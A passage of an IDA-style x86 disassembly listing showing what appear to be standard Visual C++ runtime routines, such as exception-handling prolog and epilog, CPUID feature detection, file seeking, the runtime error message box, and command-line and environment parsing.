mov [ebp+var_1C], 1
jmp short loc_419A94
; ---------------------------------------------------------------------------
loc_419A8D: ; DATA XREF: .rdata:stru_428068�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419A91: ; DATA XREF: .rdata:stru_428068�o
mov esp, [ebp+ms_exc.old_esp]
loc_419A94: ; CODE XREF: sub_419A6C+1F�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_419A6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419AA1 proc near ; DATA XREF: .data:0042A01C�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4
push ebx
push edi
push esi
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_419AC4
push ecx
popf
mov eax, 1
cpuid
loc_419AC4: ; CODE XREF: sub_419AA1+18�j
mov [ebp+var_4], edx
and dword_47A3E4, 0
and dword_47A3E0, 0
test byte ptr [ebp+var_4+3], 4
jz short loc_419AF1
call sub_419A6C
test eax, eax
jz short loc_419AF1
xor eax, eax
inc eax
mov dword_47A3E4, eax
mov dword_47A3E0, eax
loc_419AF1: ; CODE XREF: sub_419AA1+38�j
; sub_419AA1+41�j
xor eax, eax
pop esi
pop edi
pop ebx
leave
retn
sub_419AA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419AF8(double)
sub_419AF8 proc near ; CODE XREF: sub_414670+7�j
; sub_414670+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_42CF4C
call sub_41D6DE
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_419B7E
call sub_41D5AE
test eax, eax
pop ecx
pop ecx
jle short loc_419B61
cmp eax, 2
jle short loc_419B53
cmp eax, 3
jnz short loc_419B61
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Bh ; int
call sub_41D460
add esp, 10h
jmp short loc_419BC5
; ---------------------------------------------------------------------------
loc_419B53: ; CODE XREF: sub_419AF8+3F�j
push esi
push ebx
call sub_41D6DE
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_419BC5
; ---------------------------------------------------------------------------
loc_419B61: ; CODE XREF: sub_419AF8+3A�j
; sub_419AF8+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_427A70
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_419BBD
; ---------------------------------------------------------------------------
loc_419B7E: ; CODE XREF: sub_419AF8+2F�j
call sub_41D571
fstp [ebp+var_8]
fld [ebp+var_8]
pop ecx
fcomp [ebp+arg_0]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_419BA3
loc_419B95: ; CODE XREF: sub_419AF8+AE�j
push esi
push ebx
call sub_41D6DE
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_419BC5
; ---------------------------------------------------------------------------
loc_419BA3: ; CODE XREF: sub_419AF8+9B�j
test bl, 20h
jnz short loc_419B95
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_419BBD: ; CODE XREF: sub_419AF8+84�j
call sub_41D4B3
add esp, 1Ch
loc_419BC5: ; CODE XREF: sub_419AF8+59�j
; sub_419AF8+67�j ...
pop esi
pop ebx
leave
retn
sub_419AF8 endp
; =============== S U B R O U T I N E =======================================
sub_419BC9 proc near ; CODE XREF: sub_417536+18B�p
; sub_419C3D+52�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41B76B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_419BEA
call sub_417C70
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_419BEA: ; CODE XREF: sub_419BC9+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_41F05C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_419C0B
call ds:dword_41F008
jmp short loc_419C0D
; ---------------------------------------------------------------------------
loc_419C0B: ; CODE XREF: sub_419BC9+38�j
xor eax, eax
loc_419C0D: ; CODE XREF: sub_419BC9+40�j
test eax, eax
jz short loc_419C1D
push eax
call sub_417C82
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_419C3A
; ---------------------------------------------------------------------------
loc_419C1D: ; CODE XREF: sub_419BC9+46�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
mov eax, esi
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_419C3A: ; CODE XREF: sub_419BC9+52�j
pop edi
pop esi
retn
sub_419BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C3D proc near ; CODE XREF: sub_414809+69�p
; sub_414AFC+D0�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00419CCC SIZE 0000001C BYTES
push 0Ch
push offset stru_428078
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_419CCC
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_419CCC
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_419C9C
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_419BC9
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_419CB3
; ---------------------------------------------------------------------------
loc_419C9C: ; CODE XREF: sub_419C3D+49�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_419CB3: ; CODE XREF: sub_419C3D+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419CC4
mov eax, [ebp+var_1C]
jmp short loc_419CE2
sub_419C3D endp
; =============== S U B R O U T I N E =======================================
sub_419CC1 proc near ; DATA XREF: .rdata:stru_428078�o
mov ebx, [ebp+8]
sub_419CC1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419CC4 proc near ; CODE XREF: sub_419C3D+7A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_419CC4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419C3D
loc_419CCC: ; CODE XREF: sub_419C3D+15�j
; sub_419C3D+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_419CE2: ; CODE XREF: sub_419C3D+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_419C3D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419CE8 proc near ; CODE XREF: sub_414809+2B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_419D04
mov [edi+4], ebx
loc_419D04: ; CODE XREF: sub_419CE8+17�j
push 1
push ebx
push esi
call sub_419C3D
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_419D85
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_419D29
sub eax, [edi+4]
jmp loc_419E45
; ---------------------------------------------------------------------------
loc_419D29: ; CODE XREF: sub_419CE8+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_419D76
mov ebx, esi
mov ecx, esi
sar ebx, 5
mov ebx, dword_47A2E0[ebx*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_419D68
mov ecx, edx
cmp ecx, eax
jnb short loc_419D68
loc_419D5B: ; CODE XREF: sub_419CE8+7E�j
cmp byte ptr [ecx], 0Ah
jnz short loc_419D63
inc [ebp+var_8]
loc_419D63: ; CODE XREF: sub_419CE8+76�j
inc ecx
cmp ecx, [edi]
jb short loc_419D5B
loc_419D68: ; CODE XREF: sub_419CE8+6B�j
; sub_419CE8+71�j ...
cmp [ebp+var_4], 0
jnz short loc_419D8D
mov eax, [ebp+var_8]
jmp loc_419E45
; ---------------------------------------------------------------------------
loc_419D76: ; CODE XREF: sub_419CE8+50�j
test cl, cl
js short loc_419D68
call sub_417C70
mov dword ptr [eax], 16h
loc_419D85: ; CODE XREF: sub_419CE8+2D�j
or eax, 0FFFFFFFFh
jmp loc_419E45
; ---------------------------------------------------------------------------
loc_419D8D: ; CODE XREF: sub_419CE8+84�j
test byte ptr [edi+0Ch], 1
jz loc_419E3D
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_419DA6
and [ebp+var_8], ecx
jmp loc_419E3D
; ---------------------------------------------------------------------------
loc_419DA6: ; CODE XREF: sub_419CE8+B4�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:47A2E0h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_419E37
push 2
push 0
push [ebp+var_C]
call sub_419C3D
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_419DFE
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
jmp short loc_419DF4
; ---------------------------------------------------------------------------
loc_419DEB: ; CODE XREF: sub_419CE8+10E�j
cmp byte ptr [eax], 0Ah
jnz short loc_419DF3
inc [ebp+arg_0]
loc_419DF3: ; CODE XREF: sub_419CE8+106�j
inc eax
loc_419DF4: ; CODE XREF: sub_419CE8+101�j
cmp eax, ecx
jb short loc_419DEB
test byte ptr [edi+0Dh], 20h
jmp short loc_419E32
; ---------------------------------------------------------------------------
loc_419DFE: ; CODE XREF: sub_419CE8+F7�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_419C3D
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_419E25
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_419E25
test ch, 4
jz short loc_419E28
loc_419E25: ; CODE XREF: sub_419CE8+12E�j
; sub_419CE8+136�j
mov eax, [edi+18h]
loc_419E28: ; CODE XREF: sub_419CE8+13B�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_419E32: ; CODE XREF: sub_419CE8+114�j
jz short loc_419E37
inc [ebp+arg_0]
loc_419E37: ; CODE XREF: sub_419CE8+E3�j
; sub_419CE8:loc_419E32�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_419E3D: ; CODE XREF: sub_419CE8+A9�j
; sub_419CE8+B9�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_419E45: ; CODE XREF: sub_419CE8+3C�j
; sub_419CE8+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419CE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E4A proc near ; CODE XREF: sub_4148E1+12�p
; sub_414906+12�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov [ebp+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_419E68: ; CODE XREF: sub_419E4A+2B�j
cmp ecx, dword_42CF50[eax*8]
jz short loc_419E77
inc eax
cmp eax, 12h
jb short loc_419E68
loc_419E77: ; CODE XREF: sub_419E4A+25�j
mov esi, eax
shl esi, 3
cmp ecx, dword_42CF50[esi]
jnz loc_419FAB
mov eax, dword_479EA8
cmp eax, 1
jz loc_419F86
cmp eax, edx
jnz short loc_419EA7
cmp dword_42C744, 1
jz loc_419F86
loc_419EA7: ; CODE XREF: sub_419E4A+4E�j
cmp ecx, 0FCh
jz loc_419FAB
push 104h
lea eax, [ebp+var_10C]
push eax
push edx
mov [ebp+var_8], dl
call ds:dword_41F010
test eax, eax
jnz short loc_419EE0
lea eax, [ebp+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41B390
pop ecx
pop ecx
loc_419EE0: ; CODE XREF: sub_419E4A+81�j
lea eax, [ebp+var_10C]
push eax
lea edi, [ebp+var_10C]
call sub_416000
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_419F22
lea eax, [ebp+var_10C]
push eax
call sub_416000
mov edi, eax
lea eax, [ebp+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_412C40
add esp, 10h
loc_419F22: ; CODE XREF: sub_419E4A+AD�j
push edi
call sub_416000
push off_42CF54[esi]
mov ebx, eax
call sub_416000
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_412DD0
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_41B390
push edi
push ebx
call sub_41B3A0
push offset asc_4283A8 ; "\n\n"
push ebx
call sub_41B3A0
push off_42CF54[esi]
push ebx
call sub_41B3A0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_41D75B
add esp, 2Ch
jmp short loc_419FAB
; ---------------------------------------------------------------------------
loc_419F86: ; CODE XREF: sub_419E4A+46�j
; sub_419E4A+57�j
push edx
lea eax, [ebp+arg_0]
push eax
lea esi, off_42CF54[esi]
push dword ptr [esi]
call sub_416000
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_41F190
push eax
call ds:dword_41F038
loc_419FAB: ; CODE XREF: sub_419E4A+38�j
; sub_419E4A+63�j ...
lea esp, [ebp-118h]
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_4182D6
pop edi
pop esi
pop ebx
leave
retn
sub_419E4A endp
; =============== S U B R O U T I N E =======================================
sub_419FC1 proc near ; CODE XREF: sub_4148E1+9�p
; sub_414906+9�p
mov eax, dword_479EA8
cmp eax, 1
jz short loc_419FD8
test eax, eax
jnz short locret_419FF9
cmp dword_42C744, 1
jnz short locret_419FF9
loc_419FD8: ; CODE XREF: sub_419FC1+8�j
push 0FCh
call sub_419E4A
mov eax, dword_47A028
test eax, eax
pop ecx
jz short loc_419FEE
call eax
loc_419FEE: ; CODE XREF: sub_419FC1+29�j
push 0FFh
call sub_419E4A
pop ecx
locret_419FF9: ; CODE XREF: sub_419FC1+C�j
; sub_419FC1+15�j
retn
sub_419FC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419FFA proc near ; CODE XREF: .text:00414ACE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_415456
mov edi, [ebp+arg_0]
mov esi, eax
mov edx, [esi+54h]
mov eax, dword_42D064
mov ecx, edx
loc_41A015: ; CODE XREF: sub_419FFA+2A�j
cmp [ecx], edi
jz short loc_41A026
lea ebx, [eax+eax*2]
add ecx, 0Ch
lea ebx, [edx+ebx*4]
cmp ecx, ebx
jb short loc_41A015
loc_41A026: ; CODE XREF: sub_419FFA+1D�j
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp ecx, eax
jnb short loc_41A034
cmp [ecx], edi
jz short loc_41A036
loc_41A034: ; CODE XREF: sub_419FFA+34�j
xor ecx, ecx
loc_41A036: ; CODE XREF: sub_419FFA+38�j
test ecx, ecx
jz loc_41A150
mov ebx, [ecx+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_41A150
cmp ebx, 5
jnz short loc_41A05D
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_41A159
; ---------------------------------------------------------------------------
loc_41A05D: ; CODE XREF: sub_419FFA+55�j
cmp ebx, 1
jz loc_41A14B
mov eax, [esi+58h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [esi+58h], eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_41A13D
mov edx, dword_42D058
mov eax, dword_42D05C
add eax, edx
cmp edx, eax
jge short loc_41A0B6
lea eax, [edx+edx*2]
shl eax, 2
loc_41A095: ; CODE XREF: sub_419FFA+B7�j
mov edi, [esi+54h]
and dword ptr [eax+edi+8], 0
mov edi, dword_42D058
mov ebx, dword_42D05C
inc edx
add ebx, edi
add eax, 0Ch
cmp edx, ebx
jl short loc_41A095
mov ebx, [ebp+arg_0]
loc_41A0B6: ; CODE XREF: sub_419FFA+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov edi, [esi+5Ch]
jnz short loc_41A0CC
mov dword ptr [esi+5Ch], 83h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0CC: ; CODE XREF: sub_419FFA+C7�j
cmp ecx, 0C0000090h
jnz short loc_41A0DD
mov dword ptr [esi+5Ch], 81h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0DD: ; CODE XREF: sub_419FFA+D8�j
cmp ecx, 0C0000091h
jnz short loc_41A0EE
mov dword ptr [esi+5Ch], 84h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0EE: ; CODE XREF: sub_419FFA+E9�j
cmp ecx, 0C0000093h
jnz short loc_41A0FF
mov dword ptr [esi+5Ch], 85h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0FF: ; CODE XREF: sub_419FFA+FA�j
cmp ecx, 0C000008Dh
jnz short loc_41A110
mov dword ptr [esi+5Ch], 82h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A110: ; CODE XREF: sub_419FFA+10B�j
cmp ecx, 0C000008Fh
jnz short loc_41A121
mov dword ptr [esi+5Ch], 86h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A121: ; CODE XREF: sub_419FFA+11C�j
cmp ecx, 0C0000092h
jnz short loc_41A130
mov dword ptr [esi+5Ch], 8Ah
loc_41A130: ; CODE XREF: sub_419FFA+D0�j
; sub_419FFA+E1�j ...
push dword ptr [esi+5Ch]
push 8
call ebx
pop ecx
mov [esi+5Ch], edi
jmp short loc_41A144
; ---------------------------------------------------------------------------
loc_41A13D: ; CODE XREF: sub_419FFA+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_41A144: ; CODE XREF: sub_419FFA+141�j
mov eax, [ebp+var_4]
pop ecx
mov [esi+58h], eax
loc_41A14B: ; CODE XREF: sub_419FFA+66�j
or eax, 0FFFFFFFFh
jmp short loc_41A159
; ---------------------------------------------------------------------------
loc_41A150: ; CODE XREF: sub_419FFA+3E�j
; sub_419FFA+4C�j
push [ebp+arg_4]
call ds:dword_41F194
loc_41A159: ; CODE XREF: sub_419FFA+5E�j
; sub_419FFA+154�j
pop edi
pop esi
pop ebx
leave
retn
sub_419FFA endp
; =============== S U B R O U T I N E =======================================
sub_41A15E proc near ; CODE XREF: .text:00414A86�p
cmp dword_47B674, 0
jnz short loc_41A16C
call sub_4195AD
loc_41A16C: ; CODE XREF: sub_41A15E+7�j
push esi
mov esi, dword_47B664
test esi, esi
jnz short loc_41A17E
mov esi, 41FA76h
jmp short loc_41A1C3
; ---------------------------------------------------------------------------
loc_41A17E: ; CODE XREF: sub_41A15E+17�j
mov al, [esi]
cmp al, 22h
jnz short loc_41A1AC
inc esi
mov al, [esi]
cmp al, 22h
jz short loc_41A1BC
loc_41A18B: ; CODE XREF: sub_41A15E+45�j
test al, al
jz short loc_41A1A5
movzx eax, al
push eax
call sub_41D885
test eax, eax
pop ecx
jz short loc_41A19E
inc esi
loc_41A19E: ; CODE XREF: sub_41A15E+3D�j
inc esi
mov al, [esi]
cmp al, 22h
jnz short loc_41A18B
loc_41A1A5: ; CODE XREF: sub_41A15E+2F�j
cmp byte ptr [esi], 22h
jnz short loc_41A1BD
jmp short loc_41A1BC
; ---------------------------------------------------------------------------
loc_41A1AC: ; CODE XREF: sub_41A15E+24�j
cmp al, 20h
jbe short loc_41A1BD
loc_41A1B0: ; CODE XREF: sub_41A15E+56�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41A1B0
jmp short loc_41A1BD
; ---------------------------------------------------------------------------
loc_41A1B8: ; CODE XREF: sub_41A15E+63�j
cmp al, 20h
ja short loc_41A1C3
loc_41A1BC: ; CODE XREF: sub_41A15E+2B�j
; sub_41A15E+4C�j
inc esi
loc_41A1BD: ; CODE XREF: sub_41A15E+4A�j
; sub_41A15E+50�j ...
mov al, [esi]
test al, al
jnz short loc_41A1B8
loc_41A1C3: ; CODE XREF: sub_41A15E+1E�j
; sub_41A15E+5C�j
mov eax, esi
pop esi
retn
sub_41A15E endp
; =============== S U B R O U T I N E =======================================
sub_41A1C7 proc near ; CODE XREF: .text:loc_414A55�p
push ebx
xor ebx, ebx
cmp dword_47B674, ebx
push esi
push edi
jnz short loc_41A1D9
call sub_4195AD
loc_41A1D9: ; CODE XREF: sub_41A1C7+B�j
mov esi, dword_479EA0
xor edi, edi
cmp esi, ebx
jnz short loc_41A1F7
jmp short loc_41A217
; ---------------------------------------------------------------------------
loc_41A1E7: ; CODE XREF: sub_41A1C7+34�j
cmp al, 3Dh
jz short loc_41A1EC
inc edi
loc_41A1EC: ; CODE XREF: sub_41A1C7+22�j
push esi
call sub_416000
pop ecx
lea esi, [esi+eax+1]
loc_41A1F7: ; CODE XREF: sub_41A1C7+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41A1E7
lea eax, ds:4[edi*4]
push eax
call sub_41344D
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_479E7C, edi
jnz short loc_41A21C
loc_41A217: ; CODE XREF: sub_41A1C7+1E�j
or eax, 0FFFFFFFFh
jmp short loc_41A274
; ---------------------------------------------------------------------------
loc_41A21C: ; CODE XREF: sub_41A1C7+4E�j
mov esi, dword_479EA0
push ebp
jmp short loc_41A24F
; ---------------------------------------------------------------------------
loc_41A225: ; CODE XREF: sub_41A1C7+8A�j
push esi
call sub_416000
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_41A24D
push ebp
call sub_41344D
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_41A278
push esi
push eax
call sub_41B390
pop ecx
pop ecx
add edi, 4
loc_41A24D: ; CODE XREF: sub_41A1C7+6B�j
add esi, ebp
loc_41A24F: ; CODE XREF: sub_41A1C7+5C�j
cmp [esi], bl
jnz short loc_41A225
push dword_479EA0
call sub_412FE4
mov dword_479EA0, ebx
mov [edi], ebx
mov dword_47B668, 1
xor eax, eax
loc_41A272: ; CODE XREF: sub_41A1C7+C5�j
pop ecx
pop ebp
loc_41A274: ; CODE XREF: sub_41A1C7+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41A278: ; CODE XREF: sub_41A1C7+78�j
push dword_479E7C
call sub_412FE4
mov dword_479E7C, ebx
or eax, 0FFFFFFFFh
jmp short loc_41A272
sub_41A1C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A28E proc near ; CODE XREF: sub_41A3FA+54�p
; sub_41A3FA+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_41A2B1
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41A2B1: ; CODE XREF: sub_41A28E+18�j
; sub_41A28E+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_41A2C4
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_41A2F1
; ---------------------------------------------------------------------------
loc_41A2C4: ; CODE XREF: sub_41A28E+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_41A2CF
mov cl, [eax]
mov [edi], cl
inc edi
loc_41A2CF: ; CODE XREF: sub_41A28E+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_47A401[ebx], 4
jz short loc_41A2EA
inc dword ptr [esi]
test edi, edi
jz short loc_41A2E9
mov bl, [eax]
mov [edi], bl
inc edi
loc_41A2E9: ; CODE XREF: sub_41A28E+54�j
inc eax
loc_41A2EA: ; CODE XREF: sub_41A28E+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_41A323
loc_41A2F1: ; CODE XREF: sub_41A28E+34�j
test edx, edx
jnz short loc_41A2B1
cmp cl, 20h
jz short loc_41A2FF
cmp cl, 9
jnz short loc_41A2B1
loc_41A2FF: ; CODE XREF: sub_41A28E+6A�j
test edi, edi
jz short loc_41A307
and byte ptr [edi-1], 0
loc_41A307: ; CODE XREF: sub_41A28E+73�j
; sub_41A28E+96�j
and [ebp+var_4], 0
loc_41A30B: ; CODE XREF: sub_41A28E+157�j
cmp byte ptr [eax], 0
jz loc_41A3EA
loc_41A314: ; CODE XREF: sub_41A28E+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41A320
cmp cl, 9
jnz short loc_41A326
loc_41A320: ; CODE XREF: sub_41A28E+8B�j
inc eax
jmp short loc_41A314
; ---------------------------------------------------------------------------
loc_41A323: ; CODE XREF: sub_41A28E+61�j
dec eax
jmp short loc_41A307
; ---------------------------------------------------------------------------
loc_41A326: ; CODE XREF: sub_41A28E+90�j
cmp byte ptr [eax], 0
jz loc_41A3EA
cmp [ebp+arg_0], 0
jz short loc_41A33E
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41A33E: ; CODE XREF: sub_41A28E+A5�j
inc dword ptr [ebx]
loc_41A340: ; CODE XREF: sub_41A28E+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_41A349
; ---------------------------------------------------------------------------
loc_41A347: ; CODE XREF: sub_41A28E+BE�j
inc eax
inc edx
loc_41A349: ; CODE XREF: sub_41A28E+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_41A347
cmp byte ptr [eax], 22h
jnz short loc_41A379
test dl, 1
jnz short loc_41A377
cmp [ebp+var_4], 0
jz short loc_41A36A
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_41A36A
mov eax, ecx
jmp short loc_41A36C
; ---------------------------------------------------------------------------
loc_41A36A: ; CODE XREF: sub_41A28E+CE�j
; sub_41A28E+D6�j
xor ebx, ebx
loc_41A36C: ; CODE XREF: sub_41A28E+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_41A377: ; CODE XREF: sub_41A28E+C8�j
shr edx, 1
loc_41A379: ; CODE XREF: sub_41A28E+C3�j
test edx, edx
jz short loc_41A38A
loc_41A37D: ; CODE XREF: sub_41A28E+FA�j
test edi, edi
jz short loc_41A385
mov byte ptr [edi], 5Ch
inc edi
loc_41A385: ; CODE XREF: sub_41A28E+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_41A37D
loc_41A38A: ; CODE XREF: sub_41A28E+ED�j
mov cl, [eax]
test cl, cl
jz short loc_41A3D8
cmp [ebp+var_4], 0
jnz short loc_41A3A0
cmp cl, 20h
jz short loc_41A3D8
cmp cl, 9
jz short loc_41A3D8
loc_41A3A0: ; CODE XREF: sub_41A28E+106�j
test ebx, ebx
jz short loc_41A3D2
test edi, edi
jz short loc_41A3C1
movzx edx, cl
test byte_47A401[edx], 4
jz short loc_41A3BA
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_41A3BA: ; CODE XREF: sub_41A28E+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_41A3D0
; ---------------------------------------------------------------------------
loc_41A3C1: ; CODE XREF: sub_41A28E+118�j
movzx ecx, cl
test byte_47A401[ecx], 4
jz short loc_41A3D0
inc eax
inc dword ptr [esi]
loc_41A3D0: ; CODE XREF: sub_41A28E+131�j
; sub_41A28E+13D�j
inc dword ptr [esi]
loc_41A3D2: ; CODE XREF: sub_41A28E+114�j
inc eax
jmp loc_41A340
; ---------------------------------------------------------------------------
loc_41A3D8: ; CODE XREF: sub_41A28E+100�j
; sub_41A28E+10B�j ...
test edi, edi
jz short loc_41A3E0
and byte ptr [edi], 0
inc edi
loc_41A3E0: ; CODE XREF: sub_41A28E+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_41A30B
; ---------------------------------------------------------------------------
loc_41A3EA: ; CODE XREF: sub_41A28E+80�j
; sub_41A28E+9B�j
